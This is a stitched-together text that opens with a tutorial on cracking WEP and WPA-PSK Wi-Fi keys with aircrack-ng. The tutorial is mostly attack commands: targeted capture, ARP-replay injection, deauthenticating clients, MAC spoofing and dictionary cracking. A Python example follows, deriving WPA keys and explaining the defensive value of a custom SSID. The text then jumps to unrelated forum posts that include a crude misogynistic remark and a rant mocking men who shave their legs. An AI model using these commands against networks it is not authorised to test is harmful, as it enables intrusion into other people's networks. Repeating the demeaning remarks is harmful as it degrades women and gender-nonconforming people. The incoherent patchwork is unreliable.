To successfully crack WEP/WPA, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. This NIC mode is driver-dependent, and only a relatively small number of network cards support this mode under Windows.

One of the best free utilities for monitoring wireless traffic and cracking WEP/WPA-PSK keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows). The aircrack-ng site has a comprehensive list of supported network cards available here: NIC chipset compatibility list.

If your network card is not supported under Windows, one can use a free Linux Live CD to boot the system. BackTrack 3 is probably the most commonly used distribution, since it runs from a Live CD, and has aircrack-ng and a number of related tools already installed.

For this article, I am using aircrack-ng version 1.0 on a Linux partition (Fedora Core 10, 2.6 32-bit kernel) on my Sony Vaio SZ-680 laptop, using the built-in Intel 4965agn network card. If you're using the BackTrack 3 CD, aircrack-ng is already installed; with my version of Linux it was as simple as finding it with:

yum search aircrack-ng
yum install aircrack-ng

The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key cracking. The ones we will be using are:

airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.

1. Setup (airmon-ng)

As mentioned above, to capture network traffic without being associated with an access point, we need to set the wireless network card in monitor mode. To do that under Linux, in a terminal window (logged in as root), type:

iwconfig (to find all wireless network interfaces and their status)
airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

Note: You can use the su command to switch to a root account.

Other related Linux commands:

ifconfig (to list available network interfaces, my network card is listed as wlan0)
ifconfig wlan0 down (to stop the specified network card)
ifconfig wlan0 hw ether 00:11:22:33:44:55 (change the MAC address of a NIC - can even simulate the MAC of an associated client. NIC should be stopped before changing MAC address)
iwconfig wlan0 mode monitor (to set the network card in monitor mode)
ifconfig wlan0 up (to start the network card)
iwconfig - similar to ifconfig, but dedicated to the wireless interfaces.

2. Recon Stage (airodump-ng)

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. The next step is finding available wireless networks, and choosing your target:

airodump-ng mon0 - monitors all channels, listing available access points and associated clients within range.

It is best to select a target network with a strong signal (PWR column), more traffic (Beacons/Data columns) and associated clients (listed below all access points). Once you've selected a target, note its Channel and BSSID (MAC address). Also note any STATION associated with the same BSSID (client MAC addresses).

Running airodump-ng displays all wireless access points and associated clients in range, as well as MAC addresses, SSIDs, signal levels and other information about them.

WEP is much easier to crack than WPA-PSK, as it only requires data capturing (between 20k and 40k packets), while WPA-PSK needs a dictionary attack on a captured handshake between the access point and an associated client, which may or may not work.

3. Capture Data (airodump-ng)

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels. Assuming our wireless card is mon0, and we want to capture packets on channel 6 into a text file called data:

airodump-ng -c 6 --bssid 00:0F:CC:7D:5A:74 -w data mon0

(the -c 6 switch would capture data on channel 6, --bssid 00:0F:CC:7D:5A:74 is the MAC address of our target access point, -w data specifies that we want to save captured packets into a file called "data" in the current directory, mon0 is our wireless network adapter)

Running airodump-ng on a single channel targeting a specific access point.

Notes: You typically need between 20,000 and 40,000 data packets to successfully recover a WEP key. One can also use the "--ivs" switch with the airodump-ng command to capture only IVs, instead of whole packets, reducing the required disk space. However, this switch can only be used if targeting a WEP network, and renders some types of attacks useless.

4. Increase Traffic (aireplay-ng) - optional step for WEP cracking

An active network can usually be penetrated within a few minutes. However, slow networks can take hours, even days, to collect enough data for recovering the WEP key. This optional step allows a compatible network interface to inject/generate packets to increase traffic on the wireless network, therefore greatly reducing the time required for capturing data. The aireplay-ng command should be executed in a separate terminal window, concurrent to airodump-ng. It requires a compatible network card and driver that allows for injection mode.

Assuming your network card is capable of injecting packets, in a separate terminal window try:

aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0

-3 --> this specifies the type of attack, in our case ARP-request replay
-b ..... --> MAC address of access point
-h ..... --> MAC address of associated client from airodump
-x 50 --> limit to sending 50 packets per second
wlan0 --> our wireless network interface

aireplay-ng allows for injecting packets to greatly reduce the time required to recover a WEP key.

Notes: To test whether your NIC is able to inject packets, you may want to try: aireplay-ng -9 wlan0. You may also want to read the information available -here-. To see all available replay attacks, type just: aireplay-ng

5. Crack WEP (aircrack-ng)

WEP cracking is a simple process, only requiring collection of enough data to then extract the key and connect to the network. You can crack the WEP key while capturing data. In fact, aircrack-ng will re-attempt cracking the key after every 5000 packets. To attempt recovering the WEP key, in a new terminal window, type:

aircrack-ng data*.cap

(assuming your capture file is called data...cap, and is located in the same directory)

aircrack-ng can successfully recover a WEP key with 10-40k captured packets. The retrieved key is in hexadecimal, and can be entered directly into a wireless client omitting the ":" separators.

Notes: If your data file contains ivs/packets from different access points, you may be presented with a list to choose which one to recover. Usually, between 20k and 40k packets are needed to successfully crack a WEP key. It may sometimes work with as few as 10,000 packets with short keys.

6. Crack WPA or WPA2 PSK (aircrack-ng)

WPA, unlike WEP, rotates the network key on a per-packet basis, rendering the WEP method of penetration useless. Cracking a WPA-PSK/WPA2-PSK key requires a dictionary attack on a handshake between an access point and a client. What this means is, you need to wait until a wireless client associates with the network (or deassociate an already connected client so they automatically reconnect). All that needs to be captured is the initial "four-way-handshake" association between the access point and a client. Essentially, the weakness of WPA-PSK comes down to the passphrase. A short/weak passphrase makes it vulnerable to dictionary attacks.

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. This can be obtained using the same technique as with WEP in step 3 above, using airodump-ng. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0

(where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client, mon0 is your wireless NIC).

Once you have captured a four-way handshake, you also need a large/relevant dictionary file (commonly known as wordlists) with common passphrases. See related links below for some wordlist links. You can then execute the following command in a Linux terminal window (assuming both the dictionary file and captured data file are in the same directory):

aircrack-ng -w wordlist capture_file

(where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)

Additional Notes:

Cracking WPA-PSK and WPA2-PSK only needs 4 packets of data from the network (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files. A good size wordlist should be 20+ Megabytes in size; cracking a strong passphrase will take hours and is CPU intensive.

Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack. My record time was less than a minute on an all-caps 10-character passphrase using common words with less than 11,000 tested keys! A modern laptop can process over 10 Million possible keys in less than 3 hours.

WPA hashes the network key using the wireless access point's SSID as salt. This prevents the statistical key-grabbing techniques that broke WEP, and makes hash precomputation more difficult because the specific SSID needs to be added as salt for the hash. There are some tools like coWPAtty that can use precomputed hash files to speed up dictionary attacks. Those hash files can be very effective (since they're much less CPU intensive and therefore faster), but quite big in size. The Church of WiFi has computed hash tables for the 1000 most common SSIDs against a million common passphrases that are 7Gb and 33Gb in size...
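The article's closing remark, that WPA hashes the network key with the SSID as salt, refers to the PBKDF2-HMAC-SHA1 derivation of the pairwise master key defined in IEEE 802.11i (4096 rounds, 256-bit output). The Python block below is an added example, not code from the quoted article or from the aircrack-ng project: it derives the PMK, checks it against the published 802.11i test vector (passphrase "password", SSID "IEEE"), and then shows, on a constructed three-word list and two constructed SSIDs, why a hash table precomputed for a factory SSID is worthless against a network whose SSID was changed. The wordlist and SSID values are sample data invented for the demonstration.

```python
import hashlib

# Parameters fixed by IEEE 802.11i for WPA/WPA2-Personal.
PBKDF2_ITERATIONS = 4096   # PBKDF2-HMAC-SHA1 rounds
PMK_LENGTH = 32            # 256-bit pairwise master key (the "PSK")

# Published IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
IEEE_TEST_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-PSK pairwise master key from passphrase and SSID.

    Same computation as wpa_passphrase: the SSID is the PBKDF2 salt, so the
    result depends on both inputs, not on the passphrase alone.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        PMK_LENGTH,
    )


def precomputed_table(wordlist, ssid: str) -> dict:
    """Build a PMK -> passphrase table for ONE SSID, the shape of the
    coWPAtty / Church of WiFi hash files the article mentions."""
    return {wpa_pmk(word, ssid): word for word in wordlist}


def table_lookup(table: dict, passphrase: str, ssid: str):
    """Return the wordlist entry whose PMK equals PMK(passphrase, ssid),
    or None. A table built for a different SSID never matches, because
    the salt differs, even when the passphrase is in the list."""
    return table.get(wpa_pmk(passphrase, ssid))


# Constructed sample data for the demonstration (not real network values).
SAMPLE_WORDLIST = ["password", "letmein1", "correcthorse"]
DEFAULT_SSID = "linksys"          # a common factory SSID, the kind tables are built for
CUSTOM_SSID = "Home-Net-7f3a"     # a non-default SSID, absent from any such table


def demo() -> tuple:
    """Same weak passphrase, same table: hit under the factory SSID,
    miss under the changed one. Returns ("password", None)."""
    table = precomputed_table(SAMPLE_WORDLIST, DEFAULT_SSID)
    hit = table_lookup(table, "password", DEFAULT_SSID)
    miss = table_lookup(table, "password", CUSTOM_SSID)
    return hit, miss


if __name__ == "__main__":
    print(wpa_pmk("password", "IEEE").hex())
    print(demo())
```

The defensive reading is the one the article hints at: a non-default SSID forces an attacker back to 4096 PBKDF2 rounds per candidate for that network specifically, but it does nothing about a passphrase that is in the wordlist, so the SSID change complements, rather than replaces, a long random passphrase.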
  20. I used to have some trust in women, but for some (quite a long) time now I don't anymore. Most of them deserve nothing but a blowjob. In fact, isn't that what they're made for?
  21. You have to implement the YMSG protocol. And you do that on a server that runs non-stop. You create an ID, log it in, and depending on the messages received, you do certain things. For example, if someone tells your bot "vreme Cluj" (weather in Cluj), you look up the weather in Cluj on a website (cURL, if you write the bot in PHP for example) and send back the weather. That's the basic idea.
  22. Romania has good parts and bad parts. Let them show the good parts too. In the meantime, screw them. What (top-level) domains do these Swiss have? Edit: .ch
  23. Nytro

    Shaving your legs

    I work out, and my leg muscles show fairly well; their shape is visible well enough, and I don't think I need to shave for that to show. Not necessarily that it's "gay", but hair is a manly thing; for many it's the only element that means masculinity, since they have no muscles and no hair, they also let their hair grow long, and there are some who even put polish on their nails or other crap. As for what girls say, 90% of the ones I know not only don't like it, they can't stand boys who shave their legs or do other things that girls do. In other words, the ones who shave their legs or something else will slowly do more and more of the things only girls do, end up putting on makeup, and yes, you're right, they won't be gay but transvestites. Some girls like it, but the girls who like it are those who like more feminine people, who like girls more than normal, so to speak. I've seen many who shaved, and let's be serious, they look like shit. And that wouldn't be the only problem. Boys nowadays pluck their eyebrows like girls, thin eyebrows and not only that. Where is this world going to end up? If I see someone's legs and don't see hair on them, how do I tell whether it's a girl or a boy? They'll start shaving their arms too, and we'll end up a nation of nothing but "women". Well, to each his own opinion, it's a free country.
  24. Florin Salam - V-am facut-o
  25. It's not Windows, it's a different operating system. And no, it is by no means for gaming. It's not really for multimedia either.